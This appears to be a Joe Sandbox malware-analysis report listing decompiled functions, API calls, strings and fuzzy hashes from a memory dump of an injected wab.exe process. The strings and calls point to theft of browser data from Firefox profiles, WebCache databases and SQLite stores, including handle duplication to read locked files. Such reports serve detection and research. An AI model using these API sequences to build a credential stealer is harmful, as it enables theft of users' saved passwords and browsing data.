                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  • API String ID: 3510742995-2641926074
                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 004033B7
                                                  • memcpy.MSVCRT ref: 004033D0
                                                  • wcscmp.MSVCRT ref: 004033FC
                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                  • String ID: $0.@
                                                  • API String ID: 3030842498-1896041820
                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2941347001-0
                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00403C09
                                                  • memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                  • wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • wcscat.MSVCRT ref: 00403C70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  • API String ID: 3249829328-1174173950
                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040A824
                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • wcscpy.MSVCRT ref: 0040A854
                                                  • wcscat.MSVCRT ref: 0040A86A
                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 669240632-0
                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00414458
                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  • API String ID: 1343145685-3297466227
                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  • API String ID: 1714573020-3385500049
                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004087D6
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                  • memset.MSVCRT ref: 00408828
                                                  • memset.MSVCRT ref: 00408840
                                                  • memset.MSVCRT ref: 00408858
                                                  • memset.MSVCRT ref: 00408870
                                                  • memset.MSVCRT ref: 00408888
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2911713577-0
                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  • API String ID: 1475443563-3708268960
                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                  Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  • memset.MSVCRT ref: 00414C87
                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 2705122986-2036018995
                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 1579243037-1578091866
                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040E60F
                                                  • memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  • API String ID: 3354267031-2114579845
                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  • API String ID: 2221118986-1725073988
                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                  Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID: }A
                                                  • API String ID: 1821831730-2138825249
                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DeleteObject
                                                  • String ID: r!A
                                                  • API String ID: 1103273653-628097481
                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  • memcmp.MSVCRT ref: 00444BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$memcmp
                                                  • String ID: $$8
                                                  • API String ID: 2808797137-435121686
                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                  • String ID:
                                                  • API String ID: 1042154641-0
                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                  • String ID:
                                                  • API String ID: 2947809556-0
